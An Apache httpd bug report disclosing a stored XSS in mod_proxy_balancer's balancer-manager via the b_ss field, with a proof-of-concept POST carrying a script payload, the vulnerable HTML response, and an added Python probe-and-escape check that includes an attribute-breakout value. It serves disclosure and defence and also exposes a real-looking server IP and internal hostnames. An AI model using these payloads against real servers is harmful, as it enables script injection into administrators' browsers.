Bug 59561 - Stored Cross Site Scripting
Summary: Stored Cross Site Scripting
Status: NEW
Alias: None
Product: Apache httpd-2
Classification: Unclassified
Component: mod_proxy_balancer
Version: 2.4.20
Hardware: All All
Importance: P2 critical
Target Milestone: ---
Assignee: Apache HTTPD Bugs Mailing List
URL:
Keywords:
Depends on:
Blocks:
 
Reported: 2016-05-17 10:50 UTC by Łukasz Demczuk
Modified: 2016-07-07 17:53 UTC
Description Łukasz Demczuk 2016-05-17 10:50:42 UTC
Parameter: b_ss

It is possible to include JavaScript in the site.

POST /balancer/ HTTP/1.1
Host: 193.25.161.222:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://193.25.161.222:8443/balancer/?b=sgb_cluster&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

b_ss=ROUTEIDzwmgn<script>alert(1)<%2fscript>f1how&b=sgb_cluster&b_max=1&b_sforce=0&b_tmo=0&b_lbm=heartbeat&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e

Response:

HTTP/1.1 200 OK
Date: Tue, 17 May 2016 09:41:10 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head><title>Balancer Manager</title>
<style type='text/css'>
table {
 border-width: 1px;
 border-spacing: 3px;
 border-style: solid;
 border-color: gray;
 border-collapse: collapse;
 background-color: white;
 text-align: center;
}
th {
 border-width: 1px;
 padding: 2px;
 border-style: dotted;
 border-color: gray;
 background-color: white;
 text-align: center;
}
td {
 border-width: 1px;
 padding: 2px;
 border-style: dotted;
 border-color: gray;
 background-color: white;
 text-align: center;
}
</style>
</head>
<body><h1>Load Balancer Manager for 193.25.161.222</h1>

<dl><dt>Server Version: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.1e-fips mod_jk/1.2.40</dt>
<dt>Server Built: Dec  2 2014 08:09:42
</dt></dl>
<hr />
<h3>LoadBalancer Status for <a href="/balancer/?b=sgb_cluster&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e">balancer://sgb_cluster</a> [p17f73b00_sgb_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEIDzwmgn<script>alert(1)</script>f1how<td>Off</td>
</td><td>0</td><td>1</td>
<td>heartbeat</td>
<td>/sgb/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a href="/balancer/?b=sgb_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e">https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>sgb1</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>1</td><td>  0 </td><td>  0 </td></tr>
<tr>
<td><a href="/balancer/?b=sgb_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=afb01cc6-57d6-402a-a118-ccc1ded6833e">https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>sgb2</td><td>555-555-0199@example.com</td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>1</td><td>  0 </td><td>  0 </td></tr>
</table>
<hr />
<h3>LoadBalancer Status for <a href="/balancer/?b=rbp_cluster&nonce=cd3d7a62-1c66-45a7-bd12-a8eefdda4fa0">balancer://rbp_cluster</a> [p17f73b00_rbp_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEID<td>Off</td>
</td><td>0</td><td>1</td>
<td>byrequests</td>
<td>/rbp/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a href="/balancer/?b=rbp_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=cd3d7a62-1c66-45a7-bd12-a8eefdda4fa0">https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>rbp1</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
<tr>
<td><a href="/balancer/?b=rbp_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=cd3d7a62-1c66-45a7-bd12-a8eefdda4fa0">https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>rbp2</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
</table>
<hr />
<h3>LoadBalancer Status for <a href="/balancer/?b=erb_cluster&nonce=595d4440-c227-41b5-8e0b-7376b32fba01">balancer://erb_cluster</a> [p17f73b00_erb_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEID<td>Off</td>
</td><td>0</td><td>1</td>
<td>byrequests</td>
<td>/erb/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a href="/balancer/?b=erb_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=595d4440-c227-41b5-8e0b-7376b32fba01">https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>erb1</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>1</td><td>0</td><td>0</td><td>1.5K</td><td> 20 </td></tr>
<tr>
<td><a href="/balancer/?b=erb_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=595d4440-c227-41b5-8e0b-7376b32fba01">https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>erb2</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>1</td><td>0</td><td>0</td><td>1.5K</td><td> 20 </td></tr>
</table>
<hr />
<h3>LoadBalancer Status for <a href="/balancer/?b=get_cluster&nonce=fd098a63-6823-4136-92ea-a107dd82293a">balancer://get_cluster</a> [p17f73b00_get_cluster]</h3>


<table><tr><th>MaxMembers</th><th>StickySession</th><th>DisableFailover</th><th>Timeout</th><th>FailoverAttempts</th><th>Method</th><th>Path</th><th>Active</th></tr>
<tr><td>2 [2 Used]</td>
<td>ROUTEID<td>Off</td>
</td><td>0</td><td>1</td>
<td>byrequests</td>
<td>/get/mobile-seitc/servlets</td>
<td>Yes</td>
</table>
<br />

<table><tr><th>Worker URL</th><th>Route</th><th>RouteRedir</th><th>Factor</th><th>Set</th><th>Status</th><th>Elected</th><th>Busy</th><th>Load</th><th>To</th><th>From</th></tr>
<tr>
<td><a href="/balancer/?b=get_cluster&w=https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=fd098a63-6823-4136-92ea-a107dd82293a">https://polhceseitc01-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>get1</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
<tr>
<td><a href="/balancer/?b=get_cluster&w=https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets&nonce=fd098a63-6823-4136-92ea-a107dd82293a">https://polhceseitc02-test.polcard.com.pl:8443/mobile-seitc/servlets</a></td><td>get2</td><td></td><td>1</td><td>0</td><td>Init Ok </td><td>0</td><td>0</td><td>0</td><td>  0 </td><td>  0 </td></tr>
</table>
<hr />
<h3>Edit balancer settings for balancer://sgb_cluster</h3>
<form method='POST' enctype='application/x-www-form-urlencoded' action='https://193.25.161.222:8443/balancer/'>
<dl>
<table>
<tr><td>LBmethod:</td><td>
<select name='b_lbm' id='b_lbm'><option value='bytraffic'>bytraffic
<option value='heartbeat' selected >heartbeat
<option value='bybusyness'>bybusyness
<option value='byrequests'>byrequests
</select>
</td></tr>
<tr><td>Timeout:</td><td><input name='b_tmo' id='b_tmo' type=text value='0'></td></tr>
<tr><td>Failover Attempts:</td><td><input name='b_max' id='b_max' type=text value='1'></td></tr>
<tr><td>Disable Failover:</td><td>On <input name='b_sforce' id='b_sforce' value='1' type=radio> <br/> Off <input name='b_sforce' id='b_sforce' value='0' type=radio checked></td>
<tr><td>Sticky Session:</td><td><input name='b_ss' id='b_ss' size=64 type=text value ='ROUTEIDzwmgn<script>alert(1)</script>f1how'>&nbsp;&nbsp;&nbsp;&nbsp;(Use '-' to delete)</td></tr>
<tr><td colspan=2><input type=submit value='Submit'></td></tr>
</table>
<input type=hidden name='b' id='b' value='sgb_cluster'>
<input type=hidden name='nonce' id='nonce' value='afb01cc6-57d6-402a-a118-ccc1ded6833e'>
</form>
<hr />
</body></html>
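An added offline check for the behaviour shown in the request/response above (example code written for this page, not code from the reporter or from the httpd project): it pulls the per-balancer nonce out of the edit form, builds the same POST the report sends with a canary in b_ss, classifies a returned page as echoing the value raw or entity-encoded, and shows the escaping the two affected output spots (the StickySession cell and the single-quoted value='...' attribute of the edit form) need. The canary string and the two abridged pages are constructed for the example; the balancer name and nonce are copied from the report.

```python
"""Offline check for the balancer-manager b_ss (StickySession) stored XSS.

Added example for this bug report; not code from httpd or from the reporter.
The canary and the two abridged pages below are constructed for the example.
"""
import html
import re
from urllib.parse import urlencode

# Hypothetical probe marker: harmless to render, easy to grep for.
CANARY = "bzq<script>alert(1)</script>bzq"

# The edit form carries the nonce as a hidden input, as on the report's page.
NONCE_RE = re.compile(r"name='nonce' id='nonce' value='([0-9a-f-]{36})'")


def extract_nonce(page: str) -> str:
    """Pull the per-balancer nonce out of the edit form's hidden input.

    balancer-manager rejects POSTs whose nonce does not match the balancer,
    so a probe has to read the page first, exactly as the report's
    Referer/POST pair does.
    """
    m = NONCE_RE.search(page)
    if not m:
        raise ValueError("no balancer-manager edit form / nonce found")
    return m.group(1)


def build_probe_body(balancer: str, nonce: str, canary: str = CANARY) -> str:
    """Form body mirroring the report's POST, with the canary in b_ss.

    The other fields repeat the balancer's current settings so that only the
    sticky-session name changes.
    """
    return urlencode([
        ("b_ss", canary),
        ("b", balancer),
        ("b_max", "1"),
        ("b_sforce", "0"),
        ("b_tmo", "0"),
        ("b_lbm", "heartbeat"),
        ("nonce", nonce),
    ])


def classify(page: str, canary: str = CANARY) -> str:
    """'unescaped' if the canary is echoed verbatim (stored XSS confirmed),
    'escaped' if only its entity-encoded form appears, else 'absent'."""
    if canary in page:
        return "unescaped"
    if html.escape(canary, quote=True) in page:
        return "escaped"
    return "absent"


def render_sticky_cells(value: str) -> str:
    """How the two affected spots should be emitted.

    The b_ss value lands in a text node (the StickySession cell) and inside a
    single-quoted value='...' attribute of the edit form, so quotes must be
    escaped as well as angle brackets; html.escape(quote=True) covers both.
    """
    safe = html.escape(value, quote=True)
    return (f"<td>{safe}</td>\n"
            f"<input name='b_ss' id='b_ss' size=64 type=text value='{safe}'>")


def _page(cell: str, attr: str) -> str:
    # Constructed, abridged copy of the report's response layout.
    return (
        "<html><body><h3>LoadBalancer Status for balancer://sgb_cluster</h3>\n"
        "<table><tr><th>MaxMembers</th><th>StickySession</th></tr>\n"
        f"<tr><td>2 [2 Used]</td><td>{cell}<td>Off</td></td></tr></table>\n"
        "<form method='POST' action='https://193.25.161.222:8443/balancer/'>\n"
        f"<input name='b_ss' id='b_ss' size=64 type=text value ='{attr}'>\n"
        "<input type=hidden name='b' id='b' value='sgb_cluster'>\n"
        "<input type=hidden name='nonce' id='nonce' "
        "value='afb01cc6-57d6-402a-a118-ccc1ded6833e'>\n"
        "</form></body></html>\n"
    )


# Vulnerable: canary echoed raw in both places, as in the report's response.
VULNERABLE_PAGE = _page(CANARY, CANARY)
# Patched: same layout, value entity-encoded before it is written out.
_ESCAPED = html.escape(CANARY, quote=True)
PATCHED_PAGE = _page(_ESCAPED, _ESCAPED)


if __name__ == "__main__":
    nonce = extract_nonce(VULNERABLE_PAGE)
    print("probe body:", build_probe_body("sgb_cluster", nonce))
    print("vulnerable page:", classify(VULNERABLE_PAGE))
    print("patched page:   ", classify(PATCHED_PAGE))
    print(render_sticky_cells("x' onfocus='alert(1)"))
```

Against a live instance the same three steps are two requests and a re-read: GET the balancer page to obtain the nonce, POST the body, then GET again and run classify() on the result, since the value is stored in the balancer's shared memory and shows up on every later view, not only in the POST response. Because the payload is also written into the single-quoted value attribute, a value containing a single quote can break out of the attribute even where angle brackets are encoded, which is why the attribute context is escaped with quote=True above. Operationally, the control the comment below points at is the access restriction on the Location that carries SetHandler balancer-manager (Require directives); anyone allowed to POST there can already change worker routing.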
Comment 1 Jim Jagielski 2016-07-07 17:53:49 UTC
This should only be possible if the attacker has access to the balancer-manager application itself. If so, there is a lot more the attacker can do.